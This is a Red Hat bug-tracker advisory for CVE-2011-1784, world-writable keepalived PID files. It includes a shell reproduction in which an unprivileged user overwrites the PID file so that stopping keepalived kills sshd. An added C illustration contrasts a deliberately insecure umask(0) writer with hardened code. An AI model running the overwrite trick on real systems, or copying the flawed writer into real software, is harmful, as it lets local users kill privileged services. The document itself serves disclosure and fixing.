Bug 704039 (CVE-2011-1784) - CVE-2011-1784 keepalived: insecure permissions on pid files
Summary: CVE-2011-1784 keepalived: insecure permissions on pid files
Keywords:
Status: CLOSED ERRATA
Alias: CVE-2011-1784
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Priority: low
Severity: low
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard:
Depends On: 704040 704041
Blocks:
Reported: 2011-05-11 22:45 UTC by Vincent Danen
Modified: 2019-09-29 12:45 UTC (History)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2012-12-20 17:54:54 UTC
Embargoed:



Description Vincent Danen 2011-05-11 22:45:53 UTC
It was reported [1] that keepalived wrote its PID files in /var/run as world-writable files.  This could allow an unprivileged user to change the referenced PID in the PID file, and upon a service restart or stop of keepalived, would kill the other process.

The keepalived daemonize code explicitly sets umask(0), which is the root cause of this flaw, so PID file creation should probably contain an explicit permissions setting.

For instance, as root:

# service keepalived status
keepalived (pid  9634) is running...
# cat /var/run/keepalived.pid 
9634
# ls -al /var/run/keepalived.pid 
-rw-rw-rw- 1 root root 5 May 10 15:13 /var/run/keepalived.pid

Then as an unprivileged user:

% echo $(ps ax|grep sshd|grep -v grep|cut -d ' ' -f 2) >/var/run/keepalived.pid 
% cat /var/run/keepalived.pid 
1638

Back to root:

# service keepalived status
keepalived (pid  1638) is running...
# service keepalived stop
Stopping keepalived:                                       [  OK  ]
# service sshd status
openssh-daemon is stopped
# ps ax|grep sshd|grep -v grep
# ps ax|grep keepalived|grep -v grep
 9634 ?        Ss     0:00 /usr/sbin/keepalived -D
 9636 ?        S      0:00 /usr/sbin/keepalived -D
 9637 ?        S      0:00 /usr/sbin/keepalived -D

[1] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=626281
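The following is an added illustration, not keepalived's code and not part of the report above: it contrasts the flawed pattern the description names (umask(0) followed by a plain fopen(), which leaves a 0666 PID file) with a writer that passes an explicit mode and enforces it with fchmod(), and adds a reader that an init script could use to refuse a PID file that group or others can write. All function names and the /tmp paths are illustrative assumptions.

```c
/* Added example, not keepalived's own code: the flawed pattern (umask(0) plus
 * fopen(), which yields a 0666 PID file) beside a writer that sets the mode
 * explicitly, and a reader that refuses a PID file others could have altered. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* The pattern behind the bug: umask(0) makes fopen()'s default 0666 land on
 * disk unmasked. The umask is saved and restored here only so the demo does
 * not leak it to the calling process; a daemon would simply leave it at 0. */
int write_pidfile_flawed(const char *path, pid_t pid)
{
    mode_t saved = umask(0);
    FILE *f = fopen(path, "w");          /* created with 0666 & ~0 = 0666 */
    int rc = -1;
    if (f)
        rc = (fprintf(f, "%d\n", (int)pid) > 0 && fclose(f) == 0) ? 0 : -1;
    umask(saved);
    return rc;
}

/* Hardened writer: the mode is given explicitly and then enforced with fchmod,
 * so the on-disk permissions are 0644 whatever umask the daemon runs under.
 * O_NOFOLLOW refuses to write through a symlink dropped at the PID file path. */
int write_pidfile_safe(const char *path, pid_t pid)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC | O_NOFOLLOW, 0644);
    if (fd < 0)
        return -1;
    if (fchmod(fd, 0644) < 0) {
        close(fd);
        return -1;
    }
    char buf[32];
    int n = snprintf(buf, sizeof buf, "%d\n", (int)pid);
    if (n < 0 || n >= (int)sizeof buf || write(fd, buf, (size_t)n) != n) {
        close(fd);
        return -1;
    }
    return close(fd);
}

/* Defensive reader for the init-script / status side: only trust the PID if
 * the file is a regular file owned by us that group and others cannot write.
 * Returns the PID, or -1 if the file is missing, malformed or untrustworthy. */
long read_pidfile_checked(const char *path)
{
    struct stat st;
    if (stat(path, &st) < 0 || !S_ISREG(st.st_mode))
        return -1;
    if (st.st_uid != geteuid())
        return -1;
    if (st.st_mode & (S_IWGRP | S_IWOTH))   /* the CVE-2011-1784 condition */
        return -1;
    FILE *f = fopen(path, "r");
    if (!f)
        return -1;
    long pid = -1;
    if (fscanf(f, "%ld", &pid) != 1 || pid <= 0)
        pid = -1;
    fclose(f);
    return pid;
}

/* Permission bits of a path (0777 mask), or -1 if it cannot be stat'ed. */
int pidfile_mode(const char *path)
{
    struct stat st;
    if (stat(path, &st) < 0)
        return -1;
    return (int)(st.st_mode & 0777);
}

int main(void)
{
    /* Constructed scratch directory; a real daemon would write under /var/run. */
    char dir[] = "/tmp/pidfile-demo-XXXXXX";
    if (!mkdtemp(dir))
        return 1;
    char flawed[256], safe[256];
    snprintf(flawed, sizeof flawed, "%s/flawed.pid", dir);
    snprintf(safe, sizeof safe, "%s/safe.pid", dir);
    write_pidfile_flawed(flawed, getpid());
    write_pidfile_safe(safe, getpid());
    printf("flawed: %04o  safe: %04o\n", pidfile_mode(flawed), pidfile_mode(safe));
    printf("checked read of flawed: %ld, of safe: %ld\n",
           read_pidfile_checked(flawed), read_pidfile_checked(safe));
    unlink(flawed); unlink(safe); rmdir(dir);
    return 0;
}
```

The reader-side check matters as much as the writer-side fix: an init script that stats the PID file and refuses a group- or other-writable one would have reported an error instead of signalling whatever PID an unprivileged user had written into it.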

Comment 1 Vincent Danen 2011-05-11 22:47:09 UTC
Created keepalived tracking bugs for this issue

Affects: fedora-all [bug 704040]
Affects: epel-6 [bug 704041]

Comment 2 Vincent Danen 2011-05-17 23:43:50 UTC
This was assigned CVE-2011-1784.

Comment 3 Fedora Update System 2012-09-04 22:59:01 UTC
keepalived-1.2.3-2.fc16 has been pushed to the Fedora 16 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 4 Fedora Update System 2012-09-04 23:00:23 UTC
keepalived-1.2.5-2.fc17 has been pushed to the Fedora 17 stable repository.  If problems still persist, please make note of it in this bug report.

